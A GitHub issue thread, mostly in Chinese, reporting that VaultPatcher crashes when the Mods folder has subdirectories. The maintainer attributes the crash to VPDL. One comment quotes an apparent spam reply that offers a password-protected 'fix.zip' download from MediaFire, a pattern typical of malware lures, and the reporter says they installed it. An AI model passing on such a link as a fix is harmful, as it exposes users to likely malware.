### ISSUE TITLE
如果在Mods目录下有子目录会直接崩溃

### ISSUE THREAD

**Issue by Wooxin** [3093FengMing/VaultPatcher#11]
如题，如果在Mods目录下有子目录会直接崩溃

**Comment by Wooxin** [comment]
如题，如果在Mods内有子目录会直接崩溃

**Comment by Wooxin** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

I installed it，
 but it didn't have any effect

**Comment by 3093FengMing** [comment]
vpdl的问题，请更新vpdl

**Comment by Wooxin** [comment]
> vpdl的问题，请更新vpdl

我用的是最新版的VPDL 1.2

**Comment by Wooxin** [comment]
> vpdl的问题，请更新vpdl

我找到VPDL的GitHub了，我自己改了一下
